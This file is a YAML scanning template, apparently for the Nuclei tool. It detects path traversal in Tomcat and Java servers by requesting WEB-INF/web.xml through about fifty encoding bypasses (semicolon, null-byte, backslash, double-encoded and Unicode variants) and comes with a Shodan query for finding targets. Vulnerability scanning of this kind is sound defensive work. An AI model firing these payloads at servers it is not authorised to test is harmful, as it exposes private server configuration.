id: java_server_traversal

info:
  name: Tomcat / Java Server Path Traversal Detection
  author: xandsz
  severity: medium
  description: |
    Detects path traversal vulnerabilities in Tomcat and Java-based servers
    by attempting to access WEB-INF/web.xml using multiple traversal encodings.
  metadata:
    max-request: 80
    shodan-query: 'product:"Apache Tomcat"'
  tags: tomcat,java,path-traversal,webxml

http:
  - method: GET
    path:

      # ===============================
      # Basic traversal
      # ===============================
      - "{{BaseURL}}/../WEB-INF/web.xml"
      - "{{BaseURL}}/../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../../WEB-INF/web.xml"

      # ===============================
      # Semicolon / path-param bypass
      # ===============================
      - "{{BaseURL}}/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../WEB-INF/web.xml;.jsp"

      # ===============================
      # Dot / normalization bypass
      # ===============================
      - "{{BaseURL}}/./../../WEB-INF/web.xml"
      - "{{BaseURL}}/demo/../WEB-INF/web.xml"
      - "{{BaseURL}}/js/app/../../WEB-INF/web.xml"
      - "{{BaseURL}}/js/app/1/../../WEB-INF/web.xml"
      - "{{BaseURL}}//....//....//WEB-INF/web.xml"
      - "{{BaseURL}}/..../..../WEB-INF/web.xml"

      # ===============================
      # Null byte tricks
      # ===============================
      - "{{BaseURL}}/../../WEB-INF/web.xml%00"
      - "{{BaseURL}}/../../WEB-INF/web.xml%00.jsp"
      - "{{BaseURL}}/../../WEB-INF/web.xml%00.jpg"
      - "{{BaseURL}}/../../WEB-INF/web.xml%C0%80.jsp"

      - "{{BaseURL}}/../../WEB-INF/web.xml;a.jsp"
      - "{{BaseURL}}/../../WEB-INF/web.xml%00.jsp;a.jsp"
      - "{{BaseURL}}/../../WEB-INF/web.xml%00.jpg;a.jsp"
      - "{{BaseURL}}/../../WEB-INF/web.xml%C0%80.jsp;a.jsp"
      
      # ===============================
      # Query confusion
      # ===============================
      - "{{BaseURL}}/../../WEB-INF/web.xml?"

      # ===============================
      # Windows backslash traversal
      # ===============================
      - "{{BaseURL}}/..\\..\\WEB-INF/web.xml"
      - "{{BaseURL}}/..%5c..%5cWEB-INF/web.xml"
      - "{{BaseURL}}/..%5c..%5cWEB-INF/web.xml;a.jsp"
      - "{{BaseURL}}/..%255c..%255cWEB-INF/web.xml"
      - "{{BaseURL}}/..%255c..%255cWEB-INF/web.xml;a.jsp"
      - "{{BaseURL}}/%5c..%5c..%5cWEB-INF/web.xml"
      - "{{BaseURL}}/..0x5c..0x5cWEB-INF/web.xml"

      # ===============================
      # URL encoded traversal
      # ===============================
      - "{{BaseURL}}/..%2f..%2fWEB-INF/web.xml"
      - "{{BaseURL}}/..%252f..%252fWEB-INF/web.xml"
      - "{{BaseURL}}/%252e%252e/%252e%252e/WEB-INF/web.xml?"
      - "{{BaseURL}}/%2e%2e/%2e%2e/WEB-INF/web.xml%00"

      # ===============================
      # UTF-8 / Unicode bypass
      # ===============================
      - "{{BaseURL}}/..%c0%af..%c0%afWEB-INF/web.xml"
      - "{{BaseURL}}/..%c1%9c..%c1%9cWEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"

      # ===============================
      # Double-encoded UTF-8
      # ===============================
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"

      # ===============================
      # Unicode slash confusion
      # ===============================
      - "{{BaseURL}}/..%u2215..%u2215WEB-INF/web.xml%00"
      - "{{BaseURL}}/..%u2216..%u2216WEB-INF/web.xml"
      - "{{BaseURL}}/%uff0e%uff0e/%uff0e%uff0e/WEB-INF/web.xml"
      - "{{BaseURL}}/%c2.%c2./%c2.%c2./WEB-INF/web.xml"

      # ===============================
      # Mixed absolute / encoded
      # ===============================
      - "{{BaseURL}}/..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}/wiki/struts/..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}/..%252f..%252f..%252f/WEB-INF/web.xml"

      # ===============================
      # Root-based confusion
      # ===============================
      - "{{BaseURL}}/..%c0%af../WEB-INF/web.xml"
      - "{{BaseURL}}/..%2f..%2f/WEB-INF/web.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:

      - type: word
        part: body
        condition: or
        words:
          - "<web-app"
          - "<servlet>"
          - "<servlet-name>"

      - type: status
        status:
          - 200
